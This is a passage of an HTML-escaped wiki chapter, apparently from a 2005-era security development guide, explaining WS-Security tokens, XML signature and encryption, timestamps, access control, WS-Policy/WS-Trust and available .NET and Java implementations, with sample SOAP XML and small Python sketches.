''	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...									''&lt;br /&gt;
&lt;br /&gt;
''            &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:Reference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/dsig:SignedInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/dsig:Signature&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/xenc:EncryptedData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass a username and, optionally, a password – the latter is described in the Username token profile document. Unless the whole token is encrypted, a message that includes a clear-text password should always be transmitted over a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or other user directories that do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
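A minimal Python sketch of this computation (the profile concatenates the raw nonce bytes, the Created timestamp string, and the password before hashing; the nonce and timestamp values here are generated for illustration):&lt;br /&gt;

```python
import base64
import hashlib
import os
from datetime import datetime, timezone

def password_digest(password: str, nonce: bytes, created: str) -> str:
    """Base64( SHA-1( nonce + created + password ) ), per the profile formula."""
    material = nonce + created.encode("utf-8") + password.encode("utf-8")
    return base64.b64encode(hashlib.sha1(material).digest()).decode("ascii")

# Fresh random nonce and a wsu:Created-style UTC timestamp for each message.
nonce = os.urandom(16)
created = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")

digest = password_digest("s3cret", nonce, created)
```

Because the nonce and timestamp vary per message, the digest changes every time, which is what blunts replay of a captured UsernameToken.&lt;br /&gt;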
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
Binary tokens are used to convey binary data, such as X.509 certificates, in a text-encoded format – Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle the attachment of various tokens. Presently, both the X.509 and Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based token, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs be unique within the XML document where they are defined. Its use has a significant advantage for intermediate processors, as it does not require any understanding of the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e., they have closed schemas), so, when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
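This schema-independent lookup is easy to sketch: a processor simply scans the document for an attribute in the wsu namespace, with no knowledge of the payload’s structure. A minimal Python illustration on a toy fragment (real messages carry the full SOAP namespaces, omitted here for brevity):&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"

# Toy envelope fragment; only the wsu:Id attribute matters for the lookup.
soap = f'''<Envelope xmlns:wsu="{WSU}">
  <Body wsu:Id="s91397860">payload</Body>
</Envelope>'''

def find_by_wsu_id(root, wanted):
    """Locate an element by wsu:Id without knowing the message schema."""
    for el in root.iter():
        if el.get(f"{{{WSU}}}Id") == wanted:
            return el
    return None

body = find_by_wsu_id(ET.fromstring(soap), "s91397860")
```

This is essentially how a &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;/&amp;gt; in the earlier sample gets resolved to the signed Body element.&lt;br /&gt;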
&lt;br /&gt;
The WSS core specification also defines a general mechanism for referencing security tokens via the SecurityTokenReference element. An example of such an element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to virtually any possible token type (including encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of the specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e., no Enveloping or Enveloped signature modes are allowed). Prior to signing, an XML document must be transformed into its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transforms defined by the XML Digital Signature WG at W3C – Inclusive and Exclusive Canonicalization (C14N and EXC-C14N) – which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
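Why canonicalization is needed before hashing can be demonstrated in a few lines. The sketch below uses Python’s built-in canonicalizer (which implements C14N 2.0 rather than the EXC-C14N transform WSS recommends, but the principle is the same): two serializations that differ only in attribute order and quoting hash to different values as raw text, yet to the same value once canonicalized:&lt;br /&gt;

```python
import hashlib
import xml.etree.ElementTree as ET  # ET.canonicalize requires Python 3.8+

# Two semantically equivalent serializations of the same element:
# attribute order and quote style differ, the infoset does not.
doc_a = '<m b="2" a="1">hi</m>'
doc_b = "<m a='1' b='2'>hi</m>"

# Raw bytes differ, so a digest over the wire form would not match.
assert hashlib.sha1(doc_a.encode()).digest() != hashlib.sha1(doc_b.encode()).digest()

# Canonicalization normalizes attribute order, quoting, etc.
canon_a = ET.canonicalize(doc_a)
canon_b = ET.canonicalize(doc_b)

# Now the digests (and hence any signature over them) agree.
assert canon_a == canon_b
assert hashlib.sha1(canon_a.encode()).digest() == hashlib.sha1(canon_b.encode()).digest()
```

Without this step, any intermediary that re-serializes a message – even without changing its meaning – would break every signature on it.&lt;br /&gt;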
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable to dereferencing a pointer to an object of a specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be prepended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message using overlapping signature and encryption blocks, as in this case nothing points to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. As with XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with an &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and prepended to the security header in an &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
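&lt;br /&gt;
The resulting key-transport structure can be sketched as follows (the RSA 1.5 algorithm choice and the &amp;quot;#EncBody&amp;quot; reference are assumptions for the example):&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptedKey&amp;gt;''&lt;br /&gt;
''         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;''&lt;br /&gt;
''         &amp;lt;ds:KeyInfo&amp;gt;...&amp;lt;/ds:KeyInfo&amp;gt;''&lt;br /&gt;
''         &amp;lt;xenc:CipherData&amp;gt;&amp;lt;xenc:CipherValue&amp;gt;...&amp;lt;/xenc:CipherValue&amp;gt;&amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
''         &amp;lt;xenc:ReferenceList&amp;gt;''&lt;br /&gt;
''            &amp;lt;xenc:DataReference URI=&amp;quot;#EncBody&amp;quot;/&amp;gt;''&lt;br /&gt;
''         &amp;lt;/xenc:ReferenceList&amp;gt;''&lt;br /&gt;
''      &amp;lt;/xenc:EncryptedKey&amp;gt;''&lt;br /&gt;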
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via a timestamp mechanism – each security header may contain just one such element, which states the creation and expiration moments of the security header in UTC. It is important to realize that the timestamp is applied to the WSS header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach: once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change to the WSS header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. No mechanism is foreseen to address the clock synchronization issue (which, as was already pointed out earlier, is generally not an issue in modern-day systems) – as far as the WSS mechanics are concerned, this has to be addressed out-of-band. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
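&lt;br /&gt;
For instance, the simplest possible identity claim is a plain username attached via the core specification's UsernameToken (a minimal sketch; the name &amp;quot;bob&amp;quot; is made up):&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:UsernameToken&amp;gt;''&lt;br /&gt;
''         &amp;lt;wsse:Username&amp;gt;bob&amp;lt;/wsse:Username&amp;gt;''&lt;br /&gt;
''      &amp;lt;/wsse:UsernameToken&amp;gt;''&lt;br /&gt;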
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with a proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanisms for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks them against the backend user store, or extracts the subject name from the X.509 certificate used for signing the message, verifies the certificate chain, and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it be done one way or another. &lt;br /&gt;
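&lt;br /&gt;
In the common UsernameToken case, for example, the Username Token Profile defines a digest password form, where the client sends Base64(SHA-1(nonce + created + password)) rather than the cleartext password, and the service recomputes the digest against its stored secret (a sketch; the username and elided element values are placeholders):&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:UsernameToken&amp;gt;''&lt;br /&gt;
''         &amp;lt;wsse:Username&amp;gt;bob&amp;lt;/wsse:Username&amp;gt;''&lt;br /&gt;
''         &amp;lt;wsse:Password Type=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest&amp;quot;&amp;gt;...&amp;lt;/wsse:Password&amp;gt;''&lt;br /&gt;
''         &amp;lt;wsse:Nonce&amp;gt;...&amp;lt;/wsse:Nonce&amp;gt;''&lt;br /&gt;
''         &amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
''      &amp;lt;/wsse:UsernameToken&amp;gt;''&lt;br /&gt;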
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java bindings for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient detail to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities – a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply the appropriate message protection measures when constructing requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types; the one for security is WS-SecurityPolicy.&lt;br /&gt;
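&lt;br /&gt;
For example, a WS-SecurityPolicy assertion requiring that the SOAP Body be both signed and encrypted might look roughly like this (a sketch; the wsp: and sp: namespace prefixes are assumed to be bound to the appropriate WS-Policy and WS-SecurityPolicy namespaces):&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsp:Policy&amp;gt;''&lt;br /&gt;
''         &amp;lt;sp:SignedParts&amp;gt;''&lt;br /&gt;
''            &amp;lt;sp:Body/&amp;gt;''&lt;br /&gt;
''         &amp;lt;/sp:SignedParts&amp;gt;''&lt;br /&gt;
''         &amp;lt;sp:EncryptedParts&amp;gt;''&lt;br /&gt;
''            &amp;lt;sp:Body/&amp;gt;''&lt;br /&gt;
''         &amp;lt;/sp:EncryptedParts&amp;gt;''&lt;br /&gt;
''      &amp;lt;/wsp:Policy&amp;gt;''&lt;br /&gt;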
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via the trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
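&lt;br /&gt;
At the protocol level, such an exchange is initiated by sending a &amp;lt;wst:RequestSecurityToken&amp;gt; message to the trust service (a sketch; the SAML token type and the WS-Trust namespace version are assumptions for the example):&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wst:RequestSecurityToken&amp;gt;''&lt;br /&gt;
''         &amp;lt;wst:TokenType&amp;gt;http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1&amp;lt;/wst:TokenType&amp;gt;''&lt;br /&gt;
''         &amp;lt;wst:RequestType&amp;gt;http://schemas.xmlsoap.org/ws/2005/02/trust/Issue&amp;lt;/wst:RequestType&amp;gt;''&lt;br /&gt;
''      &amp;lt;/wst:RequestSecurityToken&amp;gt;''&lt;br /&gt;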
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, neither the WS-Policy nor the WS-Trust specification has been submitted for standardization to public bodies; their development is progressing via private collaboration among several companies, although it has been opened up to other participants as well. On the positive side, several interoperability events have been conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business-specific tasks, from taking orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
That is the theory. In practice, there are a lot of obstacles hidden along the way, and one of the major ones is security concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction: incompatible authentication and authorization models for users, the amount of trust between the services themselves and the ways of establishing such trust, maintaining secure connections, and synchronizing user directories or otherwise exchanging users’ attributes. These issues are briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it does not scale for open service models, and it supports only one authentication type. Services that require more flexibility have to use much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained for the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as the user population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust a user’s claim that he has already been authenticated in domain A? There are different aspects to this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in the other. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for the user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and only the fact that a user with a certain ID has successfully authenticated in another domain is communicated – as would be the case with several large corporations that would like to form a partnership but are reluctant to share customer details. The decision to accept such a request is then based on inter-domain procedures, establishing special trust relationships and allowing for the exchange of such opaque tokens – an example of Federation relationships. Of those efforts, the most notable example is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most of the existing deployments are proofs of concept or internal pilot projects rather than real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security for the message exchanges – it is the installed implementations that will assess conformance of the incoming SOAP messages to the applicable standards, as well as appropriately secure the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the light of day. The next release of WSE, 3.0, is going to coincide with the VS 2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area, and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service and interoperability is a requirement (which is usually the case), then in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of the .NET Web Service tools frequently do not cleanly handle the WS-Security and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said, the WSE package itself contains very rich and well-structured functionality, which can be utilized with both ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security, as well as WS-Trust with WS-SecureConversation. The latter are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for XML signatures and encryption, which will allow plugging in implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
